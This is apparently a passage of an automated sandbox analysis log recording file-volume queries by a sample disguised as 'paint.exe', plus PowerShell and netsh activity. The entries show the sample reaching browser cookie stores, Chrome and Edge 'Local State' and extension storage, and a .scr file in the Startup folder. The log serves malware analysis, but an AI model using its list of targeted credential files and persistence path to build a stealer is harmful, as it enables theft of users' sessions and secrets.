Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\Desktop\paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67162\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
